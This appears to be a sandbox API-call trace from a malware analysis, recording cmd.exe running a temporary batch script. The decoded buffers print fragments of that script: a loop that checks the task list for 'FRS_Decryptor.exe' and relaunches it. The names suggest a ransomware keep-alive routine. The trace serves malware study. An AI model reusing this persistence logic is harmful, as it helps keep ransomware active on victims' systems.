_String2="START") returned -3 [0143.821] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0143.821] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0143.821] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0143.821] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0143.821] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0143.821] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0143.821] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0143.821] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0143.821] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0143.821] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0143.821] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0143.821] SetErrorMode (uMode=0x0) returned 0x0 [0143.821] SetErrorMode (uMode=0x1) returned 0x0 [0143.821] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd67ba0, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0143.821] SetErrorMode (uMode=0x0) returned 0x1 [0143.821] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.821] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0143.821] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.821] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.821] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0143.821] GetLastError () returned 0x2 [0143.821] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.821] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59d70 [0143.822] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0143.822] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0143.822] GetLastError () returned 0x2 [0143.822] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59ab0 [0143.822] FindClose (in: hFindFile=0xd59ab0 | out: hFindFile=0xd59ab0) returned 1 [0143.822] GetFileType (hFile=0x28) returned 0x2 [0143.822] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0143.822] _dup (_FileHandle=1) returned 3 [0143.822] _close (_FileHandle=1) returned 0 [0143.822] _wcsicmp (_String1="nul", _String2="con") returned 11 [0143.822] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0143.822] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0143.822] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0143.823] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0143.823] SetErrorMode (uMode=0x0) returned 0x0 [0143.823] SetErrorMode (uMode=0x1) returned 0x0 [0143.823] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0143.823] SetErrorMode (uMode=0x0) returned 0x1 [0143.823] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0143.823] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0143.823] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0143.823] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.823] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0143.823] GetLastError () returned 0x2 [0143.823] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0143.823] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59d70 [0143.823] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0143.824] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0143.824] GetLastError () returned 0x2 [0143.824] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd5a0b0 [0143.824] FindClose (in: hFindFile=0xd5a0b0 | out: hFindFile=0xd5a0b0) returned 1 [0143.824] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0143.824] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0143.824] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0143.824] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0143.824] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0143.824] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0143.824] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0143.824] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0143.824] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0143.824] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0143.824] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0143.824] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0143.824] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0143.824] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0143.824] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0143.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0143.825] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0143.825] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0143.825] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x2b0, hThread=0x2e8, dwProcessId=0x648, dwThreadId=0x4d8)) returned 1 [0143.829] CloseHandle (hObject=0x2e8) returned 1 [0143.829] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0143.829] GetEnvironmentStringsW () returned 0xd7e510* [0143.829] FreeEnvironmentStringsA (penv="=") returned 1 [0143.829] WaitForSingleObject (hHandle=0x2b0, dwMilliseconds=0xffffffff) returned 0x0 [0145.923] GetExitCodeProcess (in: hProcess=0x2b0, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0145.923] CloseHandle (hObject=0x2b0) returned 1 [0145.923] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0145.923] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0145.924] GetEnvironmentStringsW () returned 0xd30508* [0145.924] FreeEnvironmentStringsA (penv="=") returned 1 [0145.924] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0145.924] GetEnvironmentStringsW () returned 0xd7e510* [0145.924] FreeEnvironmentStringsA (penv="=") returned 1 [0145.924] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0145.924] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0145.924] _close (_FileHandle=3) returned 0 [0145.924] _get_osfhandle (_FileHandle=1) returned 0x28 [0145.924] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0145.924] _get_osfhandle (_FileHandle=1) returned 0x28 [0145.924] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0145.925] _get_osfhandle (_FileHandle=0) returned 0x24 [0145.925] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0145.925] SetConsoleInputExeNameW () returned 0x1 [0145.925] GetConsoleOutputCP () returned 0x1b5 [0145.925] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0145.925] SetThreadUILanguage (LangId=0x0) returned 0x409 [0145.925] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0145.925] _open_osfhandle (_OSFileHandle=0x154, _Flags=8) returned 3 [0145.926] _get_osfhandle (_FileHandle=3) returned 0x154 [0145.926] SetFilePointer (in: hFile=0x154, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0145.926] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0145.926] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0145.926] SetFilePointer (in: hFile=0x154, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0145.926] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0145.926] GetFileType (hFile=0x154) returned 0x1 [0145.926] _get_osfhandle (_FileHandle=3) returned 0x154 [0145.926] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0145.926] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0145.926] ReadFile (in: hFile=0x154, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0145.926] SetFilePointer (in: hFile=0x154, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0145.926] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0145.926] GetFileType (hFile=0x154) returned 0x1 [0145.926] _get_osfhandle (_FileHandle=3) returned 0x154 [0145.926] SetFilePointer (in: hFile=0x154, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0145.926] _tell (_FileHandle=3) returned 2627 [0145.926] _close (_FileHandle=3) returned 0 [0145.926] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0145.927] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0145.927] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0145.927] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0145.927] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0145.932] feof (_File=0x76ea4c68) returned 0 [0145.932] ferror (_File=0x76ea4c68) returned 0 [0145.932] fgets (in: _Buf=0xd819f8, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0146.537] feof (_File=0x76ea4c68) returned 0 [0146.537] ferror (_File=0x76ea4c68) returned 0 [0146.537] fgets (in: _Buf=0xd8792e, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0146.582] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0146.583] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd44016, cbMultiByte=78, lpWideCharStr=0xd43fc8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0146.583] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0146.583] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0146.584] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0146.584] _open_osfhandle (_OSFileHandle=0x2ec, _Flags=8) returned 3 [0146.584] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.584] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0146.584] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.584] GetFileSize (in: hFile=0x2ec, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0146.584] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0146.584] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.584] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0146.584] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.584] GetFileType (hFile=0x2ec) returned 0x1 [0146.584] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0146.584] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0146.584] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0146.584] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0146.584] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0146.584] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.584] GetFileType (hFile=0x2ec) returned 0x1 [0146.584] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0146.585] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0146.585] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0146.585] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0146.585] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.585] GetFileType (hFile=0x2ec) returned 0x1 [0146.585] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0146.585] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0146.585] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.585] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.585] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.585] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.585] GetFileType (hFile=0x2ec) returned 0x1 [0146.585] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.585] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.585] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0146.585] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0146.585] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0146.585] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.585] GetFileType (hFile=0x2ec) returned 0x1 [0146.585] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0146.585] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.585] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0146.585] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0146.585] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0146.586] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.586] GetFileType (hFile=0x2ec) returned 0x1 [0146.586] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0146.586] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0146.586] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0146.586] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0146.586] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0146.586] _get_osfhandle (_FileHandle=3) returned 0x2ec [0146.586] GetFileType (hFile=0x2ec) returned 0x1 [0146.586] SetFilePointer (in: hFile=0x2ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0146.586] ReadFile (in: hFile=0x2ec, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, 